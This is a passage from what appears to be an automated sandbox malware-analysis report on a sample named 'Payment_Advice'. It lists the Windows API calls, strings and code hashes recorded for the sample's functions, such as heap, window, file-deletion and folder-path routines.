                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A65B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindFreeHeapNotification
                                                      • String ID:
                                                      • API String ID: 1642550653-0
                                                      • Opcode ID: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
                                                      • Instruction ID: 65d915e6f26a615e9ac746504162976542945709e128f4b3ee049ec15683c9c4
                                                      • Opcode Fuzzy Hash: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
                                                      • Instruction Fuzzy Hash: ECF05E72501A11EAC7212B69FC04E8BBF75AF90728F168A3AF154250F8C7369861DA5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D37
                                                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D42
                                                        • Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401D12,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020), ref: 004053D1
                                                        • Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
                                                        • Part of subcall function 00405430: RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
                                                        • Part of subcall function 00405430: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                      • String ID:
                                                      • API String ID: 1205394408-0
                                                      • Opcode ID: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
                                                      • Instruction ID: 20476b7fd3d52acee56ca048645dcf6dc253443faaa17c48622ea349d9d71071
                                                      • Opcode Fuzzy Hash: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
                                                      • Instruction Fuzzy Hash: D6E0BF71458600EAEA157B62DC82D5F7E7AFB18308741983BF450711F3CA3E9C21AA1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
                                                      • TlsAlloc.KERNEL32 ref: 0040DA87
                                                        • Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(03410000,00000000,0000000C), ref: 0040E2AE
                                                        • Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(03410000,00000000,00000010), ref: 0040E2C2
                                                        • Part of subcall function 0040E2A0: TlsSetValue.KERNEL32(0000000E,00000010,?,?,0040DA97), ref: 0040E2EB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Allocate$AllocCreateValue
                                                      • String ID:
                                                      • API String ID: 3361498153-0
                                                      • Opcode ID: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
                                                      • Instruction ID: 47f8b4ae80b8b65a038ebe855d6d80ffa77b4cff93089610e291c5bc18f8e931
                                                      • Opcode Fuzzy Hash: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
                                                      • Instruction Fuzzy Hash: 5CD012745843047BD6012BB2BC0AB843A68B704B55F518835F609962D1E7B4A040C51C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001), ref: 0040A3AD
                                                      • DeleteFileW.KERNELBASE(00000000,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001,00000000), ref: 0040A3B7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesDelete
                                                      • String ID:
                                                      • API String ID: 2910425767-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • HeapDestroy.KERNELBASE(03410000), ref: 0040DAA9
                                                      • TlsFree.KERNELBASE(0000000E), ref: 0040DAB6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: DestroyFreeHeap
                                                      • String ID:
                                                      • API String ID: 3293292866-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A648,00000000,00000000,?,?,00403573,00000000,00000000,00000800), ref: 0040A6A7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402EF1
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetEnvironmentVariableW.KERNELBASE(?,?,00403FE8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00409519
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID:
                                                      • API String ID: 1431749950-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 0040CF21
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Free
                                                      • String ID:
                                                      • API String ID: 3978063606-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409776
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: DestroyHeap
                                                      • String ID:
                                                      • API String ID: 2435110975-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 00408B2D
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00408B3C
                                                      • GetWindowTextLengthW.USER32 ref: 00408B4A
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00408B5F
                                                      • GetWindowTextW.USER32(00000000,00000001), ref: 00408B6F
                                                      • DestroyWindow.USER32(?), ref: 00408B7D
                                                      • UnregisterClassW.USER32 ref: 00408B93
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyText$AllocateClassHeapLengthLongUnregister
                                                      • String ID:
                                                      • API String ID: 3947741702-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000), ref: 00402773
                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402783
                                                        • Part of subcall function 004097E0: RtlAllocateHeap.NTDLL(00000008,00000000,00403214), ref: 004097F1
                                                        • Part of subcall function 004098C0: memcpy.MSVCRT ref: 004098D0
                                                      • FreeResource.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004027B2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                      • String ID:
                                                      • API String ID: 4216414443-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 004055B4
                                                        • Part of subcall function 0040554D: memset.MSVCRT ref: 0040555C
                                                        • Part of subcall function 0040554D: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
                                                        • Part of subcall function 0040554D: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B
                                                      • GetVersionExW.KERNEL32(?), ref: 00405613
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Version$AddressHandleModuleProcmemset
                                                      • String ID:
                                                      • API String ID: 3445250173-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00409530,0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008), ref: 004096AC
                                                      • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004096C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00408A98: wcslen.MSVCRT ref: 00408AA4
                                                        • Part of subcall function 00408A98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00408ABA
                                                        • Part of subcall function 00408A98: wcscpy.MSVCRT ref: 00408ACB
                                                      • GetStockObject.GDI32(00000011), ref: 00408BF2
                                                      • LoadIconW.USER32 ref: 00408C29
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408C39
                                                      • RegisterClassExW.USER32 ref: 00408C61
                                                      • IsWindowEnabled.USER32(00000000), ref: 00408C88
                                                      • EnableWindow.USER32(00000000), ref: 00408C99
                                                      • GetSystemMetrics.USER32(00000001), ref: 00408CD1
                                                      • GetSystemMetrics.USER32(00000000), ref: 00408CDE
                                                      • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 00408CFF
                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00408D13
                                                      • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00408D41
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408D59
                                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00408D97
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408DA9
                                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408DB1
                                                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00408DC6
                                                      • wcslen.MSVCRT ref: 00408DC9
                                                      • wcslen.MSVCRT ref: 00408DD1
                                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00408DE3
                                                      • CreateWindowExW.USER32(00000000,BUTTON,00412080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 00408E0D
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408E1F
                                                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408E56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00408E5F
                                                      • BringWindowToTop.USER32(00000000), ref: 00408E66
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00408E79
                                                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 00408E8A
                                                      • TranslateMessage.USER32(?), ref: 00408E99
                                                      • DispatchMessageW.USER32(?), ref: 00408EA4
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00408EB8
                                                      • wcslen.MSVCRT ref: 00408EC9
                                                      • wcscpy.MSVCRT ref: 00408EE1
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                      • String ID: 0$BUTTON$D A$EDIT$STATIC
                                                      • API String ID: 2919324462-3594934238
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00408FB3
                                                        • Part of subcall function 0040DFF0: TlsGetValue.KERNEL32(0000000E,?,?,004094F9,00000000), ref: 0040DFFA
                                                      • memset.MSVCRT ref: 00408FC1
                                                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 00408FCE
                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00408FF0
                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 00408FFC
                                                      • wcsncpy.MSVCRT ref: 0040901D
                                                      • wcslen.MSVCRT ref: 00409031
                                                      • wcslen.MSVCRT ref: 004090C1
                                                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 004090E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryProcwcslen$FreeInitializeLoadValuememsetwcsncpy
                                                      • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                      • API String ID: 1239124402-4219398408
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A12
                                                      • RtlInitializeCriticalSection.NTDLL(00417660), ref: 00411A1E
                                                      • TlsGetValue.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A34
                                                      • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00411A4E
                                                      • RtlEnterCriticalSection.NTDLL(00417660), ref: 00411A5F
                                                      • RtlLeaveCriticalSection.NTDLL(00417660), ref: 00411A7B
                                                      • GetCurrentProcess.KERNEL32(00000010,00100000,00000000,00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A94
                                                      • GetCurrentThread.KERNEL32 ref: 00411A97
                                                      • GetCurrentProcess.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A9E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AA1
                                                      • RegisterWaitForSingleObject.KERNEL32(0000000C,00000010,00411AFA,00000000,000000FF,00000008), ref: 00411AB7
                                                      • TlsSetValue.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AC4
                                                      • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00411AD5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2673290768-0
                                                      • Opcode ID: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
                                                      • Instruction ID: 43bccb5f44728a0c183a358cb80f19a3296933c80aeccc21ff8ea1a4f9ffad6c
                                                      • Opcode Fuzzy Hash: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
                                                      • Instruction Fuzzy Hash: A6210771646202AFDB109F64EC88F963FB9FB08391F16C07AF605962B5DB75D840CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A4A3
                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A4B5
                                                      • wcscpy.MSVCRT ref: 0040A4DB
                                                      • wcscat.MSVCRT ref: 0040A4E6
                                                      • wcslen.MSVCRT ref: 0040A4EC
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0040420D,00000000), ref: 0040A501
                                                      • wcscat.MSVCRT ref: 0040A519
                                                      • wcslen.MSVCRT ref: 0040A51F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Librarywcscatwcslen$AddressAllocateFreeHeapLoadProcValuewcscpy
                                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                      • API String ID: 1264281023-287042676
                                                      • Opcode ID: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
                                                      • Instruction ID: eb5fdde348852424068ecc2b7fae0cfe8f77c0b49747bf43ed6907260fe0b972
                                                      • Opcode Fuzzy Hash: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
                                                      • Instruction Fuzzy Hash: 6B213D31244301B6C61037799C5AF6F3A58EB91BD4F10403BF505B51C2D6BCC6659ABF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040348D
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403496
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035B6
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000), ref: 004035BF
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004034C6
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035F3
                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 004035FC
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                      • String ID: sysnative
                                                      • API String ID: 3406704365-821172135
                                                      • Opcode ID: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
                                                      • Instruction ID: d4425b2f06f1909e048ad8278635bd2b3a0af93032fa13b78a94668e4e3fc597
                                                      • Opcode Fuzzy Hash: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
                                                      • Instruction Fuzzy Hash: 33513275618301BAD600BBB1CC86F2F7AA9DFC4718F14C83EB045751D2CA7CD949AA6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D691
                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040D6A6
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040D6C1
                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040D6D0
                                                      • Sleep.KERNEL32(00000000), ref: 0040D6E2
                                                      • InterlockedExchange.KERNEL32(?,00000002), ref: 0040D6F5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                      • API String ID: 2918862794-1339284965
                                                      • Opcode ID: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
                                                      • Instruction ID: abb353811933e5e0c01fdc05904e278036aeff3206fed199cedc2971c8720e75
                                                      • Opcode Fuzzy Hash: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
                                                      • Instruction Fuzzy Hash: 7D01D431640204BBD7101FE4ED49FAF3B29EB42711F11483AF509A11C0DBBA8909CA6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409151
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040915F
                                                      • IsWindowVisible.USER32(?), ref: 00409166
                                                        • Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE
                                                      • GetCurrentThreadId.KERNEL32 ref: 00409183
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00409190
                                                      • GetForegroundWindow.USER32 ref: 0040919E
                                                      • IsWindowEnabled.USER32(?), ref: 004091A9
                                                      • EnableWindow.USER32(?,00000000), ref: 004091B9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
                                                      • String ID:
                                                      • API String ID: 684997728-0
                                                      • Opcode ID: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
                                                      • Instruction ID: 31eda471f1cb499a369295ecb2023523c5ccaadffeb814b028fd5651457c72f2
                                                      • Opcode Fuzzy Hash: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
                                                      • Instruction Fuzzy Hash: C001D4313043016EE7206B75AC8CAABBBE9AF45760B09803EF445E22E5D774CC01C629
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • EnumWindows.USER32(00409147,?), ref: 004091DB
                                                      • GetCurrentThreadId.KERNEL32 ref: 004091F3
                                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,00408F50,00000000,00408B2A), ref: 0040920F
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040922F
                                                      • EnableWindow.USER32(?,00000001), ref: 00409245
